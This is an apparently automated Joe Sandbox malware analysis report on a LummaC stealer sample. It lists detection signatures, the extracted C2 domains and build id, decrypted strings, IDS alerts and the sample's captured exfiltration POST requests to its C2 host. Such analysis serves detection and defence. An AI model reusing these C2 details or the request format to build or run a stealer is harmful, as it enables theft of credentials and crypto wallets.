Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
X2hna87N3Y.exe

Overview

General Information

Sample name:X2hna87N3Y.exe
renamed because original name is a hash value
Original sample name:443f4cf9f362a96bbd0845ba6d2859f0.exe
Analysis ID:1576576
MD5:443f4cf9f362a96bbd0845ba6d2859f0
SHA1:1bf75dea31eaf0c26da3428ae2b8518771989522
SHA256:e11c9223741b2d1291f1031539da3dd183ce2ac4b2de705d92366c6f61d94aa5
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • X2hna87N3Y.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\X2hna87N3Y.exe" MD5: 443F4CF9F362A96BBD0845BA6D2859F0)
    • conhost.exe (PID: 7424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • X2hna87N3Y.exe (PID: 7536 cmdline: "C:\Users\user\Desktop\X2hna87N3Y.exe" MD5: 443F4CF9F362A96BBD0845BA6D2859F0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["debonairnukk.xyz", "tacitglibbr.biz", "deafeninggeh.biz", "sordid-snaked.cyou", "diffuculttan.xyz", "wrathful-jammy.cyou", "awake-weaves.cyou", "effecterectz.xyz", "immureprech.biz"], "Build id": "yau6Na--7911731954"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: X2hna87N3Y.exe PID: 7536JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: X2hna87N3Y.exe PID: 7536JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: X2hna87N3Y.exe PID: 7536JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-17T09:44:46.252787+010020283713Unknown Traffic192.168.2.449730104.21.50.161443TCP
              2024-12-17T09:44:48.513726+010020283713Unknown Traffic192.168.2.449731104.21.50.161443TCP
              2024-12-17T09:44:51.088601+010020283713Unknown Traffic192.168.2.449732104.21.50.161443TCP
              2024-12-17T09:44:53.644621+010020283713Unknown Traffic192.168.2.449733104.21.50.161443TCP
              2024-12-17T09:44:55.870029+010020283713Unknown Traffic192.168.2.449734104.21.50.161443TCP
              2024-12-17T09:44:58.597611+010020283713Unknown Traffic192.168.2.449735104.21.50.161443TCP
              2024-12-17T09:45:03.023443+010020283713Unknown Traffic192.168.2.449740104.21.50.161443TCP
              2024-12-17T09:45:06.714844+010020283713Unknown Traffic192.168.2.449743104.21.50.161443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-17T09:44:47.246583+010020546531A Network Trojan was detected192.168.2.449730104.21.50.161443TCP
              2024-12-17T09:44:49.565445+010020546531A Network Trojan was detected192.168.2.449731104.21.50.161443TCP
              2024-12-17T09:45:07.452999+010020546531A Network Trojan was detected192.168.2.449743104.21.50.161443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-17T09:44:47.246583+010020498361A Network Trojan was detected192.168.2.449730104.21.50.161443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-17T09:44:49.565445+010020498121A Network Trojan was detected192.168.2.449731104.21.50.161443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-17T09:44:46.252787+010020582311Domain Observed Used for C2 Detected192.168.2.449730104.21.50.161443TCP
              2024-12-17T09:44:48.513726+010020582311Domain Observed Used for C2 Detected192.168.2.449731104.21.50.161443TCP
              2024-12-17T09:44:51.088601+010020582311Domain Observed Used for C2 Detected192.168.2.449732104.21.50.161443TCP
              2024-12-17T09:44:53.644621+010020582311Domain Observed Used for C2 Detected192.168.2.449733104.21.50.161443TCP
              2024-12-17T09:44:55.870029+010020582311Domain Observed Used for C2 Detected192.168.2.449734104.21.50.161443TCP
              2024-12-17T09:44:58.597611+010020582311Domain Observed Used for C2 Detected192.168.2.449735104.21.50.161443TCP
              2024-12-17T09:45:03.023443+010020582311Domain Observed Used for C2 Detected192.168.2.449740104.21.50.161443TCP
              2024-12-17T09:45:06.714844+010020582311Domain Observed Used for C2 Detected192.168.2.449743104.21.50.161443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-17T09:44:44.702846+010020582301Domain Observed Used for C2 Detected192.168.2.4543261.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-17T09:44:52.295457+010020480941Malware Command and Control Activity Detected192.168.2.449732104.21.50.161443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://tacitglibbr.biz/api5pnXAvira URL Cloud: Label: malware
              Source: https://tacitglibbr.biz/$Avira URL Cloud: Label: malware
              Source: https://tacitglibbr.biz/apiGyAvira URL Cloud: Label: malware
              Source: 00000000.00000002.1739887798.0000000002B36000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["debonairnukk.xyz", "tacitglibbr.biz", "deafeninggeh.biz", "sordid-snaked.cyou", "diffuculttan.xyz", "wrathful-jammy.cyou", "awake-weaves.cyou", "effecterectz.xyz", "immureprech.biz"], "Build id": "yau6Na--7911731954"}
              Source: X2hna87N3Y.exeVirustotal: Detection: 52%Perma Link
              Source: X2hna87N3Y.exeReversingLabs: Detection: 50%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.8% probability
              Source: X2hna87N3Y.exeJoe Sandbox ML: detected
              Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
              Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
              Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
              Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
              Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
              Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: effecterectz.xyz
              Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
              Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: immureprech.biz
              Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tacitglibbr.biz
              Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: yau6Na--7911731954
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00418A48 CryptUnprotectData,2_2_00418A48
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 2_2_00DB52D0 CryptContextAddRef,GetLastError,2_2_00DB52D0
              Source: X2hna87N3Y.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: X2hna87N3Y.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 0_2_00D9D358 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00D9D358
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h2_2_0043C070
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx edi, byte ptr [esp+esi]2_2_00435880
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+000000E0h]2_2_0040C97B
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov byte ptr [eax], bl2_2_0040C97B
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov byte ptr [eax], dl2_2_0040C97B
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx esi, byte ptr [esp+ebp-6DCE19CBh]2_2_0040C593
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx esi, byte ptr [esp+ebp-6DCE19CBh]2_2_0040C593
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h2_2_004256E0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then jmp ebp2_2_0043B800
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then inc edi2_2_0042C024
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_004330F0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov ebx, eax2_2_00405930
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov ebp, eax2_2_00405930
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+30h]2_2_0041A9F0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042C189
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+3FE92E27h]2_2_004091B0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx ecx, byte ptr [ebx+eax-030ABCF4h]2_2_00425A42
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+45DEA01Ch]2_2_00423249
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov word ptr [esi], cx2_2_00423249
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h2_2_00423249
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov esi, dword ptr [esp+38h]2_2_00423249
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h2_2_00427250
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_0042B258
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov edi, edx2_2_0042B258
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx]2_2_00438A00
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov ecx, ebx2_2_00438A00
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h2_2_00419210
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3Ch]2_2_0040C22A
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+45DEA01Ch]2_2_004232C0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov word ptr [esi], cx2_2_004232C0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h2_2_004232C0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00426288
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then jmp ebp2_2_0043BA90
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov ecx, eax2_2_00421AAD
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A8F779E4h2_2_00421AAD
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0040BAB0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov word ptr [eax], cx2_2_004262B1
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx eax, byte ptr [ebx]2_2_00436B74
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx ecx, word ptr [esi+eax+02h]2_2_00436B74
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_0042B3C0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov edi, edx2_2_0042B3C0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then jmp ecx2_2_00439B80
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+14h]2_2_00421390
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx-000000B6h]2_2_00421390
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then test eax, eax2_2_004363A0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov dword ptr [esi+08h], edx2_2_0042C3A4
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h2_2_0041B3B2
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0040BC3E
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then jmp ebp2_2_0043B4D0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h2_2_00428480
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+10h]2_2_0041AC8E
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx esi, byte ptr [edi]2_2_00416C91
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]2_2_00407490
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]2_2_00407490
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov byte ptr [esi], al2_2_00416494
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h2_2_004294A0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then cmp byte ptr [edx+ecx+01h], 00000000h2_2_00428D60
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+57C69F03h]2_2_0041D520
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx]2_2_0041D520
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042AD2D
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h2_2_004275C0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov word ptr [eax], cx2_2_004275C0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then jmp ebp2_2_0043B5C0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov edi, eax2_2_004095B0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-06C6522Eh]2_2_00418E01
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov word ptr [edi], cx2_2_0041BE3C
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then jmp ebp2_2_0043B6E0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_00428EF0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then jmp dword ptr [00442888h]2_2_0041C6A4
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax-31h]2_2_0040A740
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov edx, ecx2_2_00427F40
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then jmp ebp2_2_0043B770
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx eax, byte ptr [esp+edi]2_2_00408F00
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h2_2_00427726
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-06C6522Eh]2_2_00418F36
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then mov byte ptr [esi], al2_2_0041A7EF
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h2_2_00424F90

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2058230 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tacitglibbr .biz) : 192.168.2.4:54326 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49732 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49734 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49735 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49740 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49730 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49731 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49743 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.4:49733 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49732 -> 104.21.50.161:443
              Source: Malware configuration extractorURLs: debonairnukk.xyz
              Source: Malware configuration extractorURLs: tacitglibbr.biz
              Source: Malware configuration extractorURLs: deafeninggeh.biz
              Source: Malware configuration extractorURLs: sordid-snaked.cyou
              Source: Malware configuration extractorURLs: diffuculttan.xyz
              Source: Malware configuration extractorURLs: wrathful-jammy.cyou
              Source: Malware configuration extractorURLs: awake-weaves.cyou
              Source: Malware configuration extractorURLs: effecterectz.xyz
              Source: Malware configuration extractorURLs: immureprech.biz
              Source: Joe Sandbox ViewIP Address: 104.21.50.161 104.21.50.161
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.50.161:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.50.161:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tacitglibbr.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: tacitglibbr.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=47HA2BJC5LRQZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18138Host: tacitglibbr.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WKKY9HQD72NIN8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8765Host: tacitglibbr.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7XS29QDJ54QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20400Host: tacitglibbr.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6R60VIOJM9OLEPQJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1266Host: tacitglibbr.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Z58EJ5HRPTGP3ZMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551867Host: tacitglibbr.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: tacitglibbr.biz
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: tacitglibbr.biz
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tacitglibbr.biz
